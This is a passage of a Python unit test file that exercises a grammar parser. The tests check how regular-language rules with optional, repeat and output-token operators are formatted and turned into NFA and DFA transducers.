# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst03 = DFA_from_NFA(fst01, True)
# fst03.draw('dfa2', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008e(self):
spec01 = '<nt01>:( <nt02> [token01]| <nt03> [token02])[token03];'
spec_expected = '( <nt02> [ token01 ] | <nt03> [ token02 ] ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst03 = DFA_from_NFA(fst01, True)
# fst03.draw('dfa2', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009(self):
spec01 = '<nt01>:( t02 | t03 );'
spec_expected = '( t02 | t03 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009b(self):
spec01 = '<nt01>:( t02[token01] | t03 );'
spec_expected = '( t02 [ token01 ] | t03 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009c(self):
spec01 = '<nt01>:( t02 | t03 [token01]);'
spec_expected = '( t02 | t03 [ token01 ] )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009e(self):
spec01 = '<nt01>:( t02 | t03) [token01];'
spec_expected = '( t02 | t03 ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009f(self):
spec01 = '<nt01>:( t02 [token01]| t03[token02]) [token03];'
spec_expected = '( t02 [ token01 ] | t03 [ token02 ] ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010(self):
spec01 = '<nt01>:t02? t03;'
spec_expected = 't02? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010b(self):
spec01 = '<nt01>:(t02 [token01])? t03;'
spec_expected = '( t02 [ token01 ] )? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010c(self):
spec01 = '<nt01>:(t02?)[token01] t03;'
spec_expected = '( t02? ) [ token01 ] t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010d(self):
spec01 = '<nt01>:t02? t03 [token01];'
spec_expected = 't02? t03 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010e(self):
spec01 = '<nt01>:(t02? t03 )[token01];'
spec_expected = '( t02? t03 ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010f(self):
spec01 = '<nt01>:(((t02 [token01])?)[token02] t03 [token03])[token04];'
spec_expected = '( ( ( t02 [ token01 ] )? ) [ token02 ] t03 [ token03 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
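# test_0011 .. test_0013b: a {0,1} finite repeat is canonicalized by the
# formatter to the '?' operator, e.g. 't02{0,1}' round-trips as 't02?'.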
def test_0011(self):
spec01 = '<nt01>:t02{0,1} t03;'
spec_expected = 't02? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0011b(self):
spec01 = '<nt01>:(t02[token01]){0,1} t03;'
spec_expected = '( t02 [ token01 ] )? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012(self):
spec01 = '<nt01>:( t02 t03 )?;'
spec_expected = '( t02 t03 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012b(self):
spec01 = '<nt01>:( t02 [token01] t03 )?;'
spec_expected = '( t02 [ token01 ] t03 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012c(self):
spec01 = '<nt01>:( t02 [token01] t03 [token02] )?;'
spec_expected = '( t02 [ token01 ] t03 [ token02 ] )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012d(self):
spec01 = '<nt01>:(( t02 t03 ) [token01])?;'
spec_expected = '( ( t02 t03 ) [ token01 ] )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012e(self):
spec01 = '<nt01>:((( t02[token01] t03[token02] ) [token03])?)[token04];'
spec_expected = '( ( ( t02 [ token01 ] t03 [ token02 ] ) [ token03 ] )? ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0013(self):
spec01 = '<nt01>:( t02 t03 ){0,1};'
spec_expected = '( t02 t03 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0013b(self):
spec01 = '<nt01>:((( t02[token01] t03[token02] ) [token03]){0,1})[token04];'
spec_expected = '( ( ( t02 [ token01 ] t03 [ token02 ] ) [ token03 ] )? ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014(self):
spec01 = '<nt01>:t02* t03;'
spec_expected = 't02* t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014b(self):
spec01 = '<nt01>:(t02 [token01])* t03;'
spec_expected = '( t02 [ token01 ] )* t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014c(self):
spec01 = '<nt01>:t02* t03[token01];'
spec_expected = 't02* t03 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014d(self):
spec01 = '<nt01>:(t02[token01])* t03[token02];'
spec_expected = '( t02 [ token01 ] )* t03 [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014e(self):
spec01 = '<nt01>:((t02[token01])*)[token02] t03[token03];'
spec_expected = '( ( t02 [ token01 ] )* ) [ token02 ] t03 [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014f(self):
spec01 = '<nt01>:[token04](((t02[token01])*)[token02] t03[token03])[token05];'
spec_expected = '[ token04 ] ( ( ( t02 [ token01 ] )* ) [ token02 ] t03 [ token03 ] ) [ token05 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
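# test_0014z: out-tokens stacked on the same atom are merged into a
# single bracket list, so ((t03 [token01])[token02])[token03] formats
# as 't03 [ token01 token02 token03 ]'.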
def test_0014z(self):
spec01 = '<nt01>:t02* ((t03 [token01])[token02])[token03];'
spec_expected = 't02* t03 [ token01 token02 token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015(self):
spec01 = '<nt01>:t02 t03*;'
spec_expected = 't02 t03*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015b(self):
spec01 = '<nt01>:t02 [token01]t03*;'
spec_expected = 't02 [ token01 ] t03*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015c(self):
spec01 = '<nt01>:t02 (t03[token01])*;'
spec_expected = 't02 ( t03 [ token01 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015d(self):
spec01 = '<nt01>:t02 (t03*)[token01];'
spec_expected = 't02 ( t03* ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015e(self):
spec01 = '<nt01>:t02 [token01] (t03[token02])*;'
spec_expected = 't02 [ token01 ] ( t03 [ token02 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015f(self):
spec01 = '<nt01>:t02 [token01] ((t03[token02])*)[token03];'
spec_expected = 't02 [ token01 ] ( ( t03 [ token02 ] )* ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015g(self):
spec01 = '<nt01>:[token04](t02 [token01] ((t03[token02])*)[token03])[token05];'
spec_expected = '[ token04 ] ( t02 [ token01 ] ( ( t03 [ token02 ] )* ) [ token03 ] ) [ token05 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016(self):
spec01 = '<nt01>:(t02 t03)*;'
spec_expected = '( t02 t03 )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016b(self):
spec01 = '<nt01>:(t02[token01] t03)*;'
spec_expected = '( t02 [ token01 ] t03 )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016c(self):
spec01 = '<nt01>:(t02 t03[token01])*;'
spec_expected = '( t02 t03 [ token01 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016d(self):
spec01 = '<nt01>:(t02[token01] t03[token02])*;'
spec_expected = '( t02 [ token01 ] t03 [ token02 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016e(self):
spec01 = '<nt01>:((t02[token01] t03[token02])*)[token03];'
spec_expected = '( ( t02 [ token01 ] t03 [ token02 ] )* ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017(self):
spec01 = '<nt01>:t02+ t03;'
spec_expected = 't02+ t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017b(self):
spec01 = '<nt01>:(t02 [token01])+ t03;'
spec_expected = '( t02 [ token01 ] )+ t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017c(self):
spec01 = '<nt01>:t02+ t03 [token01];'
spec_expected = 't02+ t03 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017d(self):
spec01 = '<nt01>:(t02[token01])+ t03 [token02];'
spec_expected = '( t02 [ token01 ] )+ t03 [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017e(self):
spec01 = '<nt01>:[token05]((t02[token01])+ t03 [token02])[token04];'
spec_expected = '[ token05 ] ( ( t02 [ token01 ] )+ t03 [ token02 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018(self):
spec01 = '<nt01>:t02 t03+;'
spec_expected = 't02 t03+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018b(self):
spec01 = '<nt01>:t02 [token01]t03+;'
spec_expected = 't02 [ token01 ] t03+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018c(self):
spec01 = '<nt01>:t02 (t03 [token01])+;'
spec_expected = 't02 ( t03 [ token01 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
